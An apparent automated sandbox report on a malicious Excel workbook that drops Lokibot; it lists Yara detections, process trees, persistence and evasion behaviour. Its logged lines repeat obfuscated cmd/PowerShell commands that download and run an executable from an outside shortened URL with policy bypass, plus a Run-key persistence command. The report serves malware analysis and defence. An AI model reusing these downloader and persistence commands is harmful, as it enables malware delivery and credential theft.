                Source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
                Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Loki_1 author = kevoreilly, description = Loki Payload, cape_type = Loki Payload
                Source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Lokibot hash1 = 6f12da360ee637a8eb075fb314e002e3833b52b155ad550811ee698b49f37e8c, author = JPCERT/CC Incident Response Group, description = detect Lokibot in memory, rule_usage = memory scan, reference = internal research
                Source: ntrwe.exe.11.dr, i5Y/Wm2.csCryptographic APIs: 'CreateDecryptor'
                Source: ntrwe.exe.11.dr, Fe1/Fy1.csCryptographic APIs: 'TransformFinalBlock'
                Source: 11.0.12.exe.12a0000.0.unpack, Fe1/Fy1.csCryptographic APIs: 'TransformFinalBlock'
                Source: 11.0.12.exe.12a0000.0.unpack, i5Y/Wm2.csCryptographic APIs: 'CreateDecryptor'
                Source: 11.2.12.exe.12a0000.3.unpack, i5Y/Wm2.csCryptographic APIs: 'CreateDecryptor'
                Source: 11.2.12.exe.12a0000.3.unpack, Fe1/Fy1.csCryptographic APIs: 'TransformFinalBlock'
                Source: 15.0.ntrwe.exe.e90000.0.unpack, i5Y/Wm2.csCryptographic APIs: 'CreateDecryptor'
                Source: 15.0.ntrwe.exe.e90000.0.unpack, Fe1/Fy1.csCryptographic APIs: 'TransformFinalBlock'
                Source: 15.2.ntrwe.exe.e90000.4.unpack, i5Y/Wm2.csCryptographic APIs: 'CreateDecryptor'
                Source: 15.2.ntrwe.exe.e90000.4.unpack, Fe1/Fy1.csCryptographic APIs: 'TransformFinalBlock'
                Source: 16.0.ntrwe.exe.e90000.0.unpack, i5Y/Wm2.csCryptographic APIs: 'CreateDecryptor'
                Source: powershell.exe, 00000006.00000002.2103852429.000000001CD80000.00000002.00000001.sdmp, 12.exe, 0000000B.00000002.2187386267.0000000008780000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
                Source: classification engineClassification label: mal100.spyw.expl.evad.winXLS@27/18@2/3
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_0040650A LookupPrivilegeValueW,AdjustTokenPrivileges,
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_0040434D CoInitialize,CoCreateInstance,VariantInit,SysAllocString,VariantInit,VariantInit,SysAllocString,VariantInit,SysFreeString,SysFreeString,CoUninitialize,
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\B5DE0000Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeMutant created: \Sessions\1\BaseNamedObjects\DE4229FCF97F5879F50F8FD3
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCF6F.tmpJump to behavior
                Source: 6Cprm97UTl.xlsOLE indicator, Workbook stream: true
                Source: C:\Windows\SysWOW64\reg.exeConsole Write: ................................T.h.e. .o.p.e.r.a.t.i.o.n. .c.o.m.p.l.e.t.e.d. .s.u.c.c.e.s.s.f.u.l.l.y.........X.......N.......p...............
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Users\user\AppData\Local\Temp\12.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Users\user\ntrwe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Users\user\ntrwe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Users\user\ntrwe.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\12.exe C:\Users\user\AppData\Local\Temp\12.exe
                Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                Source: unknownProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                Source: unknownProcess created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
                Source: unknownProcess created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
                Source: unknownProcess created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
                Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\12.exe C:\Users\user\AppData\Local\Temp\12.exe
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess created: C:\Windows\SysWOW64\cmd.exe 'cmd.exe' /c REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                Source: C:\Users\user\AppData\Local\Temp\12.exeProcess created: C:\Users\user\ntrwe.exe 'C:\Users\user\ntrwe.exe'
                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' /f /v 'jfdts' /t REG_SZ /d 'C:\Users\user\ntrwe.exe'
                Source: C:\Users\user\ntrwe.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
                Source: C:\Users\user\ntrwe.exeProcess created: C:\Users\user\AppData\Local\Temp\RegAsm.exe C:\Users\user\AppData\Local\Temp\RegAsm.exe
                Source: C:\Users\user\AppData\Local\Temp\12.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
                Source: Binary string: RegAsm.pdb source: RegAsm.exe
                Source: Binary string: mscorrc.pdb source: powershell.exe, 00000006.00000002.2099102007.0000000002720000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2140184576.000000001B940000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2158358112.000000001B8A0000.00000002.00000001.sdmp

                Data Obfuscation:

                barindex
                Obfuscated command line foundShow sources
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe cmd /c po^wer^she^l^l -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/qjdJoz4','12.exe')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 .('S'+'tart'+'-Sl'+'eep') 20; Move-Item '12.exe' -Destination '${enV`:temp}'
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass .('S'+'tart'+'-Sl'+'eep') 25; cd ${enV`:temp};.('.'+'/12.exe')
                Yara detected aPLib compressed binaryShow sources
                Source: Yara matchFile source: 0000000F.00000002.2194899454.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181372307.00000000040CD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194803649.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213431587.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2212693514.0000000002790000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194883394.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213384290.0000000003CBD000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213452314.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213472587.0000000003D3F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181768708.000000000411B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181829102.000000000414F000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181861219.0000000004169000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.2181751190.0000000004101000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194844744.0000000003CF1000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2194860595.0000000003D0B000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000012.00000002.2213485795.0000000003D59000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000F.00000002.2193389507.0000000002792000.00000004.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.2351105842.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000013.00000002.2208511718.0000000000400000.00000040.00000001.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: 12.exe PID: 2800, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2192, type: MEMORY
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 17.2.RegAsm.exe.400000.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 19.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_012A5456 push ss; retf
                Source: C:\Users\user\AppData\Local\Temp\12.exeCode function: 11_2_0031AB04 pushad ; ret
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_00E95456 push ss; retf
                Source: C:\Users\user\ntrwe.exeCode function: 15_2_005013F1 push edx; retf
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_0025523F push cs; iretd
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00402AC0 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 17_2_00402AC0 push eax; ret
                Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 19_2_0123523F push cs; iretd

                Persistence and Installation Behavior:

                barindex
                Drops PE files to the document folder of the userShow sources
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\12.exeJump to dropped file
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\Documents\12.exeJump to dropped file
                Source: C:\Users\user\ntrwe.exeFile created: C:\Users\user\AppData\Local\Temp\RegAsm.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\12.exeFile created: C:\Users\user\ntrwe.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\12.exeFile created: C:\Users\user\ntrwe.exeJump to dropped file

                Boot Survival:

                barindex
                Drops PE files to the user root directoryShow sources
                Source: C:\Users\user\AppData\Local\Temp\12.exeFile created: C:\Users\user\ntrwe.exeJump to dropped file
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jfdtsJump to behavior
                Source: C:\Windows\SysWOW64\reg.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run jfdtsJump to behavior

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                Source: C:\Users\user\AppData\Local\Temp\12.exeFile opened: C:\Users\user\AppData\Local\Temp\12.exe\:Zone.Identifier read attributes | delete
                Source: C:\Users\user\ntrwe.exeFile opened: C:\Users\user\ntrwe.exe\:Zone.Identifier read attributes | delete
                Source: C:\Users\user\ntrwe.exeFile opened: C:\Users\user\ntrwe.exe\:Zone.Identifier read attributes | delete
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
